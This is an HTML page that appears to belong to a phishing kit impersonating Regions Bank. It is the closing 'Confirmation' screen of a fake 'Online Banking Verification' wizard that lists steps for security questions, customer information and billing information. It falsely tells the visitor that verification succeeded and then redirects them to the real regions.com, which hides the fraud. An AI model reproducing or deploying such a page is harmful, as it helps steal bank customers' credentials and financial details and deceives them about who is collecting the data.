<!DOCTYPE html>
<html lang="en" class="no-js">

<head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta http-equiv="Refresh" content="3; url=https://www.regions.com/">
  <meta name="viewport" content="width=device-width, initial-scale=1">


  <title>Regions Online Banking Verification - Verification Online Banking - Regions Online Banking</title>
  <link rel="shortcut icon" href="favicon.ico">




  <link rel="stylesheet" href="assets/css2/com-regions.min.css">
  <link href="assets/css2/combined.css.1.css" rel="stylesheet">
  <link href="assets/css2/combined.css.2.css" rel="stylesheet">




  <style>
    .warning-message {
      background-color: #fff9e3;
      padding: 10px;
      margin: 10px;
    }
  </style>
  <style type="text/css" id="amaze-css-module">
    .orange-button:focus,
    .regions-orange-button:focus,
    a.nexterror:focus,
    a.previouserror:focus,
    button:focus,
    h3:focus,
    input:focus,
    select:focus {
      outline: #1d8795 solid 2px !important
    }

    .orange-button:focus {
      border-color: inherit
    }

    .regions-orange-button:focus {
      border-color: transparent
    }

    .icon-circle-print:focus,
    .regions-back-button:focus,
    .regions-cancel-button:focus,
    .ui-dialog-titlebar-close:focus {
      outline: #1d8795 solid 2px
    }

    .amaze-clipper {
      position: absolute;
      clip: rect(1px 1px 1px 1px);
      clip: rect(1px, 1px, 1px, 1px);
      width: 1px;
      height: 1px;
      overflow: hidden
    }

    a.amaze-skip-navigation:focus {
      position: absolute;
      top: 0;
      left: 0;
      background-color: #1d8795;
      color: #fff;
      border: 0;
      padding: 8px 15px 8px 8px;
      border-radius: 0 0 15px;
      box-shadow: #999 2px 2px 8px 1px
    }

    table.regions-table>tbody>tr>th {
      border-bottom: 1px solid #d8d8d5 !important;
      border-radius: 0 !important;
      border-top: 0 none;
      font-size: 14px;
      padding: 10px 15px;
      text-align: left;
      vertical-align: middle
    }

    .amaze-offscreen {
      position: absolute !important;
      clip: rect(1px 1px 1px 1px);
      /* IE6, IE7 */
      clip: rect(1px, 1px, 1px, 1px);
      overflow: hidden;
      width: 1px;
      height: 1px;
    }
  </style>
</head>

<body class="regions-page rds-wizard" data-regions="page" data-resized="true">
  <style>
    .wrapper,
    .message,
    important-message-banner {
      display: none !important;
    }
  </style>
  <div id="contentWrapper" style="display: block;">

    <div>

      <header class="rds-header simple">
        <div class="container">
          <a class="logo-link" href="" title="Go home">
            <picture class="logo">
              <source srcset="assets/img/regions-logo-no-r.svg" media="(max-width: 600px)">
              <img src="assets/img/regions-logo-no-r.svg" alt="regions logo">
              <!-- ^^ SRC for IE compatibility, IE doesn't support srcset.-->
            </picture>
          </a>
        </div>
      </header>

      <main>
        <header class="rds-marquee">
          <div class="container">
            <div class="marquee-title">




              <section class="sub-menu">
                <h1>Regions Online Banking Verification</h1>

              </section>

            </div>
          </div>
        </header>






        <section id="enrollment-home" class="template">
          <section id="columnFill">
            <section class="regions-widget enrollments-enrollmentwidget">


              <div class="rds-wizard-body enrollment-container">

                <div class="body-content container">
                  <div class="rds-step-header">
                    <h1 class="sr-only">Verification Steps</h1>
                    <ol class="rds-steps">
                      <li class="step col-sm-3 col-xs-12 hidden-xs"><span class="badge"><span class="sr-only">Step -</span>1</span>Security Questions</li>
                      <li class="step col-sm-3 col-xs-12 hidden-xs"><span class="badge"><span class="sr-only">Step -</span>2</span>Customer Information</li>
                      <li class="step col-sm-3 col-xs-12 hidden-xs"><span class="badge"><span class="sr-only">Step -</span>3</span>Billing Information</li>
                      <li class="step current col-sm-3 col-xs-12"><span class="badge"><span class="sr-only">Step-</span>4<span class="sr-only">current step -</span></span>Confirmation</li>
                    </ol>
                  </div>
                </div>



                <div id="step3Congrats">


                  <div class="rds-form">
                    <div class="rds-short-form-tile">
                      <div class="form-content text-center">
                        <h2 class="title">You've successfully completed verification Steps for your Online Banking!</h2>
                        <div class="row">
                          <p class="col-xs-12">You can now send payments, transfers and
                            access tools to help you manage your finances today! <br>If you
                            want to add another business to your Online Banking profile, you
                            may do so in the Customer Service tab once logged in.<br>
                            You will be redirected now to authentication page....
                          </p>
                        </div>

                      </div>
                    </div>
                  </div>

                </div>

              </div>
    </div>
    </section>
    </section>

    </section>




    </main>

    <footer class="rds-footer">




      <div class="footer-content">


        <ul>
          <li>
            <a href="#">
              Contact Us
            </a>
          </li>
          <li>
            <a href="#">
              Terms and Conditions
            </a>
          </li>
          <li>
            <a href="#">
              Privacy Pledge
            </a>
          </li>
          <li>
            <a href="#">
              Security
            </a>
          </li>
          <li>
            <a href="#">
              Online Tracking and Advertising
            </a>
          </li>
          <li>
            <a href="#">
              Accessible Banking
            </a>
          </li>
          <li>
            <span id="FeedbackLink"></span>

          </li>
        </ul>
        <ul>
          <li>Call 1-800-REGIONS</li>
        </ul>

        <p>Regions, the Regions logo, the LifeGreen color, and the LifeGreen bike are registered trademarks of
          Regions Bank.</p>
        <p>© 2021 Regions Bank. All Rights Reserved.</p>

        <ul>
          <li class="footer-icon"><img src="assets/img/equal-housing-lender.svg" alt=""><span class="sr-only">Equal
              Housing Lender</span></li>
          <li class="footer-icon"><img src="assets/img/member-fdic.svg" alt=""><span class="sr-only">Member
              FDIC</span></li>
        </ul>

      </div>

      <style>
        .footer-content a {
          color: #178;
        }
      </style>




    </footer>
  </div>




  </div>


</body>

</html>